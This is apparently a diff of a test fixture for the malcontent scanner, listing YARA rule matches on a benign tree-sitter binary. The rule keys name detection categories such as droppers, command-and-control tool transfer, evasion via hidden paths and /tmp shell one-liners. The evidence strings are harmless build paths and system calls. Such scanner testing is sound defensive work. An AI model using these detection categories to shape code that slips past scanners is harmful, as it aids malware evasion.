----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
-| HIGH | [exec/shell/tmp_semicolon](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/tmp_semicolon.yara#semicolon_short_tmp) | unusual one-liners involving /tmp | [--;/tmp/rust-20241004-6494-uljaw4/rustc-1](https://github.com/search?q=--%3B%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1&type=code) |
-| MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References 'dropper' | [Dropper](https://github.com/search?q=Dropper&type=code) |
-| MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) |
-| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#static_hidden_path) | possible hidden file path | [/clap/issues/home/linuxbrew/.cache](https://github.com/search?q=%2Fclap%2Fissues%2Fhome%2Flinuxbrew%2F.cache&type=code)
[/debug/.J](https://github.com/search?q=%2Fdebug%2F.J&type=code)
[/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) |
-| MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) |
-| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execvp](https://github.com/search?q=execvp&type=code) |
-| MEDIUM | [exec/shell/power](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/powershell.yara#powershell) | powershell | [powershell](https://github.com/search?q=powershell&type=code) |
-| MEDIUM | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.cache/Homebrew/cargo_cache/registry/src/index.crates.](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.cache%2FHomebrew%2Fcargo_cache%2Fregistry%2Fsrc%2Findex.crates.&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/tree-sitter/0.24.2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Ftree-sitter%2F0.24.2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code) |
-| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/col](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fcol&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/raw](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fraw&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/str](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fstr&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/syn](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fsyn&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/vec](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fvec&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/cell](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fcell&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/esca](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fesca&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/io/b](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fio%2Fb&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/num/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fnum%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/ops/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fops%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/slic](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fslic&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/str/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fstr%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/time](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Ftime&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/io/mo](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fio%2Fmo&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/io/st](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fio%2Fst&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/os/fd](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fos%2Ffd&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sync/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsync%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sys/p](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsys%2Fp&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sys/s](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsys%2Fs&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/threa](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fthrea&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/addr2line-0.22](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Faddr2line-0.22&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/gimli-0.29.0/s](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fgimli-0.29.0%2Fs&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/hashbrown-0.14](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fhashbrown-0.14&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/miniz_oxide-0.](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fminiz_oxide-0.&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/rustc-demangle](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Frustc-demangle&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/config/s](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fconfig%2Fs&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/generate](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fgenerate&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/src/high](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fsrc%2Fhigh&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/highlight/sr](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fhighlight%2Fsr&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/binding_](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fbinding_&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/././](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2F.%2F&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./ge](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fge&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./la](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fla&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./pa](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fpa&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./qu](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fqu&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./st](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fst&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./su](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fsu&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./tr](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Ftr&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/tags/src/lib](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Ftags%2Fsrc%2Flib&type=code) |
-| MEDIUM | [fs/proc/self_exe](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe) | gets executable associated to this process | [/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code) |
-| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [Content-Type](https://github.com/search?q=Content-Type&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) |
-| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | generic listen string | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) |
-| MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) |
-| LOW | [data/encoding/json_encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-encode.yara#JSONEncode) | encodes JSON | [JSON.stringify](https://github.com/search?q=JSON.stringify&type=code) |
-| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) |
-| LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
-| LOW | [exec/dylib/iterate](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/iterate.yara#dl_iterate_phdr) | [iterate over list of shared objects](https://man7.org/linux/man-pages/man3/dl_iterate_phdr.3.html) | [dl_iterate_phdr](https://github.com/search?q=dl_iterate_phdr&type=code) |
-| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) |
-| LOW | [exec/shell/SHELL](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/SHELL.yara#SHELL) | [path to active shell](https://man.openbsd.org/login.1#ENVIRONMENT) | [SHELL](https://github.com/search?q=SHELL&type=code) |
-| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) |
-| LOW | [fs/directory/list](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-list.yara#GoReadDir) | Uses Go functions to list a directory | [.ReadDir](https://github.com/search?q=.ReadDir&type=code) |
-| LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlinkat](https://github.com/search?q=unlinkat&type=code) |
-| LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) |
-| LOW | [fs/symlink_resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/symlink-resolve.yara#realpath) | [resolves symbolic links](https://man7.org/linux/man-pages/man3/realpath.3.html) | [realpath](https://github.com/search?q=realpath&type=code) |
-| LOW | [fs/tempdir/tempfile_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) |
-| LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) |
-| LOW | [net/http/2](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http2.yara#http2) | Uses the HTTP/2 protocol | [HTTP/2](https://github.com/search?q=HTTP%2F2&type=code) |
-| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request) | makes HTTP requests | [HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code) |
-| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) |
-| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) |
-| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) |
-| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvmsg](https://github.com/search?q=recvmsg&type=code) |
-| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmsg](https://github.com/search?q=sendmsg&type=code) |
-| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop](https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop)
[https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi](https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j)
[https://code.jquery.com/jquery-3.3.1.min.js](https://code.jquery.com/jquery-3.3.1.min.js)
[https://docs.rs/getrandom](https://docs.rs/getrandom)
[https://docs.rs/tree-sitter-language/](https://docs.rs/tree-sitter-language/)
[https://docs.rs/tree-sitter/](https://docs.rs/tree-sitter/)
[https://github.com/ChimeHQ/SwiftTreeSitter](https://github.com/ChimeHQ/SwiftTreeSitter)
[https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car](https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car)
[https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c](https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c)
[https://github.com/tree-sitter/tree-sitter-Failed](https://github.com/tree-sitter/tree-sitter-Failed)
[https://gitlab.com/https](https://gitlab.com/https)
[https://parser.cparser.h](https://parser.cparser.h)
[https://tree-sitter.github.io/tree-sitter.jshttps](https://tree-sitter.github.io/tree-sitter.jshttps)
[https://tree-sitter.github.io/tree-sitter.wasmhttps](https://tree-sitter.github.io/tree-sitter.wasmhttps)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png](https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png](https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png)
[https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT](https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT)
[https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j](https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j)
[https://tree-sitter.github.io/tree-sitter/creating-parsers](https://tree-sitter.github.io/tree-sitter/creating-parsers)
[https://tree-sitter.github.io/tree-sitter/playground](https://tree-sitter.github.io/tree-sitter/playground)
[https://tree-sitter.github.io/tree-sitter/syntax-highlighting](https://tree-sitter.github.io/tree-sitter/syntax-highlighting)
[https://tree-sitter.github.io/tree-sitter/using-parsers](https://tree-sitter.github.io/tree-sitter/using-parsers) |
-| LOW | [os/fd/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/write.yara#py_fd_write) | writes to a file handle | [stdout.write(output)](https://github.com/search?q=stdout.write%28output%29&type=code) |
-| LOW | [process/chdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir.yara#chdir_shell) | changes working directory | [cd -u env -i](https://github.com/search?q=cd+-u++env+-i&type=code) |
-| LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) |
-| LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) |
-| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) |
-| LOW | [process/thread_local_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/thread_local_storage.yara#tls_get_addr) | [Uses glibc thread local storage](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) |
-| LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) |
+| RISK | KEY | DESCRIPTION | EVIDENCE |
+|--------|-----------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
+| HIGH | [exec/shell/tmp_semicolon](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/tmp_semicolon.yara#semicolon_short_tmp) | unusual one-liners involving /tmp | [--;/tmp/rust-20241004-6494-uljaw4/rustc-1](https://github.com/search?q=--%3B%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1&type=code) |
+| MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References 'dropper' | [Dropper](https://github.com/search?q=Dropper&type=code) |
+| MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) |
+| MEDIUM | [discover/process/runtime_deps](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/runtime_deps.yara#tls_get_addr) | [looks up thread private variables, may be used for loaded library discovery](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) |
+| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/clap/issues/home/linuxbrew/.cache](https://github.com/search?q=%2Fclap%2Fissues%2Fhome%2Flinuxbrew%2F.cache&type=code)
[/debug/.J](https://github.com/search?q=%2Fdebug%2F.J&type=code)
[/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) |
+| MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) |
